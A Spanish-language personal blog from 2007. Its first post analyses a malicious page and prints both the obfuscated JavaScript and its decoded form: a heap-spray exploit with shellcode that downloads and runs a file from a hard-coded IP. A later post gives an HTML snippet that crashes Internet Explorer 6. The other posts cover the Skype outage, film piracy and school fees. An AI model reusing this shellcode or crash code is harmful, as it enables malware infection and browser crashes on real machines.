\xf7\xa7\x96\xe2\x94\x94\xf7\xa7\xe5\x97\x90\x94\xf7\xa7\x97\xe0\x96\xea\xf7\xa7\x97\xea\xe5\xe1\xf7\xa7\x94
\x94\xe6\xe2\xf7\xa7\x94\x94\x94\x94\xf7\xa7\x94\x94\xe7\xe0\xf7\xa7\x97\xea\x96\xe2\xf7\xa7\x94\x94\x96\xe5
\xf7\xa7\x94\x94\x94\x94\xf7\xa7\xe5\xe6\xe4\xea\xf7\xa7\xe5\xe2\xe5\xe6\xf7\xa7\xe0\x94\xe1\x93\xf7\xa7\xe1
\xe5\xe0\x94\xf7\xa7\xe0\x97\xe1\xe3\xf7\xa7\xe0\x97\xe1\xeb\xf7\xa7\xe1\xe1\xe1\xe3\xf7\xa7\xe0\x97\xe1\xe7
\xf7\xa7\xe1\xe7\xe1\xe3\xf7\xa7\xe0\x94\xe1\xe1\xf7\xa7\xe4\xeb\xe4\xe4\xf7\xa7\xe4\xe7\xe4\x91\xf7\xa7\xe5
\xe2\xe0\x97\xf7\xa7\xe5\xe2\xe4\xea\xf0\xfb\xe9\xee\xfd\x81\x91\x80\x9b\x82\x86\xec\xee\xfd\x9a\x97\x93\x96
\xec\xee\x90\x9d\x96\x8b\xec\xee\x97\x9f\x90\x97\x96\xf2\x81\x80\x91\xef\xf0\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x93
\x93\x93\x93\x90\x90\x90\x90\x91\x91\x91\x91\x96\x96\x96\x96\x97\x97\x97\x97\x94\x94\x94\x94\x95\x95\x95
\x95\x9a\x9a\x9a\x9a\x9b\x9b\x9b\x9b\x98\x98\x98\x98\x99\x99\x99\x99\x9e\x9e\x9e\x9e\x93\x93\x93\xd7\x9c
\x9c\x9c\x9c\x9d\x9d\x9d\x9d\x93\x93\x93\xd7\x83\x83\x83\x83\x80\x80\x80\x80\x81\x81\x81\x81\x86\x86\x86
\x86\x87\x87\x87\x87\x84\x84\x84\x84\x85\x85\x85\x85\x8a\x8a\x8a\x8a\x8b\x8b\x8b\x8b\x88\x88\x88\x88\xe2
\xe2\xe2\xe2\xe3\xe3\xe3\xe3\xe0\xe0\xe0\xe0\xe1\xe1\xe1\xe1\xe6\xe6\xe6\xe6\xe7\xe7\xe7\xe7\xe4\xe4\xe4
\xe4\xe5\xe5\xe5\xe5\xea\xea\xea\xea\xeb\xeb\xeb\xeb\xfc\xa5\xbf\xa4\xf0\xec\xee\xfd\x97\x9f\x90\x97\x96\xec
\xee\xfd\x90\x9d\x96\x8b\xec\xee\xfd\x9a\x86\x9f\x9e\xec\xf2";
var xored_str = xor_str(plain_str, 210);
document.write(xored_str);
 </script>
</body>


¿¿alguien ve algo raro por aqui??
digo aparte de que existe un megascript en JavaScript.. pero que dice el mentado script...
peus aki les va ya desenciptaado por cierto el valor de 210 que es la llave varia cada vez

<HTML><HEAD><SCRIPT>var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41
%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7
%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C
%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E
%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8
%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98
%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40
%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u372F%u2E31%u2E39%u3331%u2E35
%u3531%u2F33%u6966%u656C%u702E%u7068");
</SCRIPT></HEAD><BODY>
<EMBED SRC="---------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------
-------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRS
SSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED></BODY></HTML> -->

Trate de bajar la mentada pelicula pero no la pude encontrar, el sevidor me dice que no existe :( yo queria ver que tiene...
En firefox este codigo no tiene ningun efecto (y menos con noscript el cual impide que se ejecute por completo) pero en IE aparece una ventana de Windows Media player embedida, lo que me hace pensar que genera un  nombre de archivo aleatorio y descarga la pelicula, que muy posiblemente este urilizando una vulnerabilidad de Windows media pero son solo conjeturas puesto que no pude obtener nada de informacion extra y como no hay un dominio existenete sino una ip, pues no hay mucho mas que investigar.

Saludos




20

Ago

Skype explica que paso el 16 de Agosto

Esta ha sido la versión oficial que ha publicado hoy Skype sobre lo ocurrido el 16 de Agosto

"El jueves 16 de Agosto del 2007, la red peer-to-peer de Skype se volvio inestable y sufrio una interrupción critica.
Esta interrupción se debio a la reinciada masiva de computadoras al rededor del mundo en un corto lapso de tiempo, puesto que se reiniciaron despues de recivir un grupo de parches via las Actualizaciones de Windows.

El alto numerode reinicios afecto los recursos de la red de Skype. Esto cuaso que el las peticiones de log-in inundaran la red, lo cual combinado con los pocos recursos de la red peer-to-peer, dieron com resultado una cadena de sucesos que llevaron a tener un impacto critico.

Normalmente la red peer-to-peer de Skype tiene la hablilidad de auto-recuaperarse, sin embargo, este evento revelo un bug en el software el cual no habia sido visto, el cual es referente a el algorirmo de asignacion de recurso de red, el cual impidio que la función de auto-recuperación trabajara de una froma rápida. Desafortunadamente, como resultado de este hecho, Skype no estubo disponible para la mayoria de los usuarios por casi dos dias.

Este hecho ya ha sido idententificado en Skype. Así que podemos confirmar de una manera categorica que no se trato de ninguna actividad maliciosa como fue especulado y por lo tanto la seguridad de nuestros usuarios nunca estubo en risgo en ningun momento.

Esta interrupción no ha tenido precedentes en el impacto y el alcance. Nos gustaria puntualizar que muy pocas tecnologias o redes de comunicación en  la actualidad garantizan una operación sin interrupciones.

Estamos muy orgullosos de que durante estos 4 años de operaciónm Skype ha brindado un herramienta de comunicacion muy fuerte a millones de personas al rededor del mundo. Skype ha identificado y agregado un número de mejoras a su programa para asegurar que sus usuarios no se vean nuevamente afectados en la remoda posibilidad de que esta combinación de eventos volviera a ocurrir.

La comunidad de usuarios de Skype nos a apoyado increiblemente y estamos muy agradecidos por todos sus buenos comentarios y agradecimientos.
"

Esta es una traducción no oficial de la entrada What happened on August 16 que aparecio en el blog oficial de Skype el dia de hoy.

Saludos

20

Ago

Pelicula pirata de los Simpsons es rastreada hasta un celular en Australia

Un hombre de 21 años ha sido arrestado en Australia, sospechoso de haber grabado la pelicula de los simpson en su celular y haberla subido al internet. Este sujeto ha sido culpado de robo de copyright y podria pasar hasta 5 años en la carcel.
Una copia ilegal de la pelicula esta diponible en un sitio de videos en internet y fue descargada más de 3000 veces esto antes de que se estrenara la pelicula en EU, esto de acuerdo con la AFACT (agencia encargada de vigilar lo del copyright en Australia). Parece ser que esta copia fue la primera en el mundo, y fue rastreada hasta una dierección en Sydney.

Investigadores de la AFACT  han descubierto que la pelicuala tambien fue reeditada en frances, reformateada y puesta a dispocición del publico en general por via de Bittorrent y otros servicios peer-to-peer, dando esto como resultado mas de 110,000 descargas.

Adrianne Pecotic, director ejecutivo de AFACT, menciono que mas del 90 por ciento de las peliculas estrenadas, que aparecen en internet y en las calle al rededor del mundo, son producto de copias hechas con camaras de video.
"La velocidad y disperción de las copias ilegales en todo el internet como resultado de esta copia hehca en un telefono celular en un cine de Sydney es asombroso"


Y después de ver todo esto me pregunto como es posible que en méxico se estrenen antes que en EU, si muchas veces ya vienen hasta en español las películas, esto hace sospechar de que muchas personas dentro de las cadenas de distribución están seriamente inmiscuidas en el negocio de la piratería.

Y porque no solo los chinos son piratas.... Viva México cabrones...

20

Ago

Bug Cierra Internet Explorer 6

Navegando por haí me topé con este pequeño código de html, el cual puede llegar a tronar internet explorer 6, este bug se produce debido a que IE6 no puede manejar correctamente el código malformado que se muestra a continuación:
<style>*{position:relative}</style><table><input></table>
Al parecer el error se genera en mshtml.dll, que por el nombre parecer ser la encargada del parseo del html.

Si te sientes muy confiado o queieres poner a prueba tu navegador (Firefox esta libre de tal fallo), aqui esta una página la cual explota la vulnerabilidad.
Algo que tenemos que tomar en cuenta es que esta vulnerabilidad no parece ejecutar codigo malicioso.

Saludos y ya no usen el IE6 es rechafa...

18

Ago

Skype Funciona de nuevo

Despues de que por casi dos dias el servicio de login de Skype estubiera caido, por consiguiente los usuarios no podian utilizarlo, se anuncia que por fin el hecho ha sido resuelto que la mayoria de la gente puede disfrutar de el servicio de skype otra vez.

En el transcurso de esta caida de Skype, se especulaba que podia se debido a fallas de los servidores o se llego a decir que se trataba de un ataque de hacking.

Alo anterior gente de Skype respondio que se trataba de un error en el algoritmo de login, es decir que metieron las patas en la ultima version del skype. Lo que no queda claro es si el problema del algoritmo fue en los clientes o en el servidor.

Esperemos que este tipo de hechos no se vuelvan a repetir puesto que hay mnuchos intereses de por medio.

Saludos

18

Ago

las cuotas en las escuelas basicas del pais

Desde que yo recuerdo este ha sido uno de los temas más controversiales de la educación mexicana, las cuotas que cobran las escuelas para que tus hijos tengan derecho a inscribirse, el cual desde un punto de vista legal es completamente inconstitucional, puesto que el articulo tercer dice que la educacion que impartira el estado debera de ser gratuita, no dice que estara sujeta a algun tipo de cuota o costo alguno para lo mexicanos.

Hoy en la mañana vei al mero bueno de la sociedad de padres de familia del estado, asi como otras dos personas de la secretaria de educación del estado, los cuales decian que esta cuota no tiene por que ser una condicional para la inscripcion de los niños a la escuela, sin embargo el congreso de la union anuncio que se podrian hacer donaciones voluntarias a las escuelas, ( que a final de cuentas siguen siendo las ya vistas cuotas).

Yo no tengo hijos y por lo tanto aun no se lo que  es pagar 100 pesos o mas por niño para que sea aceptado o tenga derecho a inscribirse a una esculea "Gratuita". Pero si estoy seguro que cuando sea el momento pondre todo lo que este de mi para terminar con este tipo de cobros que estan fuera de la ley.
Saludos